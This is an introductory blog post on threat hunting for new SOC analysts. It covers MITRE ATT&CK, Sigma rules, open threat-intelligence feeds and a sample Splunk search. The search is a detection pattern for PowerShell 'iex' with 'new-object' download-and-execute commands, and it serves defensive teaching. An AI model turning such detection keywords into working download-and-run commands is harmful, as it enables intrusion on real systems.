The purpose of this blog post is to introduce new analysts to threat hunting activities, terms, tools, and the field of threat hunting. It is not a comprehensive compendium of how to threat hunt, but more of a nudge in the right direction for rookie analysts based on my experiences.
What Is Threat Hunting
Threat hunting is the proactive, analyst-driven process to search for attacker tactics, techniques, and procedures (TTP) within a network environment. Threat Hunting is usually done by teams of experts who track Adversary TTPs which are researched to understand what to search for in the log sources gathered by SIEMs or network analyzer tools.
Information about attacker TTPs most often originate in the form of indicators of compromise observed from threat intelligence sources such as vendor threat feeds, virus repositories, three-letter agency disclosures, and social media posts
Threat Hunting isn’t just for DFIR experts or seasoned analysts. It can be conducted by ad-hoc investigations based on some piece of evidence to start the investigations. However, analysts should be trained to know and be able determine the security baseline before conducting any threat hunts, to avoid alerting on any normal activity.
Threat Hunting Training
There are several avenues for pursuing training in threat hunting. However, keep in mind, that threat hunting is meant for experts to be able to identify sophisticated attacks and be able to develop detection mechanisms, which requires a great deal of understanding of many technologies and how they interact with each other.
Below are some courses for training in threat hunting:
- Cybray – Intro to Threat Hunting
- Active Countermeasures Threat Hunting Course (free)
- SANS Incident Response and Threat Hunting
- FireEye Cyber Threat Hunting
Another great way to delve into threat hunting is to look up SANS Cyber Security Summit Archives for various presentations about threat hunting, as in this industry, there is no one common body of knowledge and information gathered over the years by individuals is spread out in various blogs and slide decks from security conferences over the years.
Threat Hunting Activities
Rather than rely on alerts from the SIEM to kick off an investigation, analysts should be proactively engaging in threat hunting investigations to uncover suspicious or malicious activity.
The blog post will go over four main activities that any Tier 1 SOC analyst can do to threat hunt:
- Researching the TTPs: MITRE & Sigma
- Curating Threat Lists from Open Source Threat Intelligence Feeds
- Subscribing to news, vendors, & social media for adversary information
- Crafting precision searches on the SIEM
The next several sections will detail the process for each of these.
1. Researching the TTPs: MITRE & Sigma
Analysts can begin to start their threat hunts by researching various TTPs of attacks and there are two great resources for tackling the vast number of tactics and techniques, MITRE and SIGMA.
The MITRE ATT&CK framework is a knowledge base of adversary behavior, a common language to share intelligence based off a standard model. The matrix can be used to organize and formulate proactive investigations by emulating adversary techniques that are most likely to target network environments.
The adversary tactics are at the top and the columns list all the known ways of accomplishing the tactic. Moreover, techniques can belong to more than one tactic. Analysts routinely use the matrix to craft precision searches, come up with SIEM use cases to trigger alarms, and start proactive investigations using the various tools at their disposal.
By clicking on any of the techniqques, bring you to a closer look which gives you a detailed description, dependencies, examples of APT usages, and recommendations for detection and mitigations.
The Sigma GitHub project, maintained by Florian Roth is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.
Analysts can go through these Sigma rules categorically and use these indicators of compromise to create alerts or perform searches in their environment for this activity.
2. Curating Threat Lists from Open Source Threat Intelligence Feeds
Threat lists with fresh IOCs can be compiled from various open source intelligence feeds, malware repositories, and malware researchers on social media in order to create a threat list to feed into SIEM alerts.
Below are some examples of open sources of threat intelligence feeds;
- Abuse CH
- Cryptolaemus Daily Emotet IOCs
- VirusTotal Community Threat intelligence
- AlienVault Threat Intelligence Feeds
- Twitter (Hashtags: #emotet, #ryuk, #trickbot, #opendir, etc.)
Analysts can make it a routine to proactively scour these sources to harvest, update and improve the threat lists that are triggering any IOC based SIEM alarms. Over time, analysts who perform this will learn who provides actionable threat intelligence, specifically on Twitter, where there are certain users that give excellent information.
You can read more about this in my blog post, Scraping IOCs from the Internet.
3. Subscribing to news, vendors, & social media for adversary information
Another way to stay on top of threats and to proactively threat hunt is to subscribe news, vendors, or some social media.
News sites, such as BleepingComputer, can be used to keep on top of the most recent threats and to determine if threats are worth devouting more time to.
Vendors usually have some sort of subscription based service where if you are a client you can configure email alert updates for things such as patch release information, IPS signature updates, vulnerability disclosure, and other important information.
Lastly, Twitter is one of the most excellent sources of threat intelligence and news because the community tends to be always looking to share the next critical vulnerability with a CVSS score of 10.
All of these can be used in some way to form the basis of your investigation or threat hunt. Either by identifying some IOC (string in a URL, IP address, hash value, etc.) or learning about the newest attack tactic.
4. Crafting precision searches on the SIEM
For the purposes of this blog post, I will focus on the SIEM Splunk.
Percision searches can be created to identify specific activity occurring in an environment via a SIEM. Splunk has the capability to form permissions searches using the Search Processing Language (SPL) which provides over 140 commands that allow you to search, correlate, analyze and visualize any data. More information on SPL can be found here.
Threat hunting using precision searches can be used by leveraging MITRE ATT&CK and SIGMA to create queries to perform searches based on indicators of compromise.
For example, if you were an analyst, one of the techniques you may be looking for in your environment may be the Sigma rule Suspicious PowerShell Invocations. Where this rule looks for keywords such as :
If we took one of those keywords and fed it into a Splunk search, it would look like the following:
Splunk Search for PowerShell IEX Commands
index=* sourcetype="WinEventLog:Security" Process_Command_Line=* | eval Process_Command_Line=lower(Process_Command_Line) | search Process_Command_Line=*iex*new-object* | stats VALUES(Process_Command_Line) BY host
These are some of these things you can do as a Tier 1 analyst to start your journey into threat hunting. Should you come across an actual threat, I recommend escalating to a senior analyst.
Last Updated for Accuracy: July 27, 2020.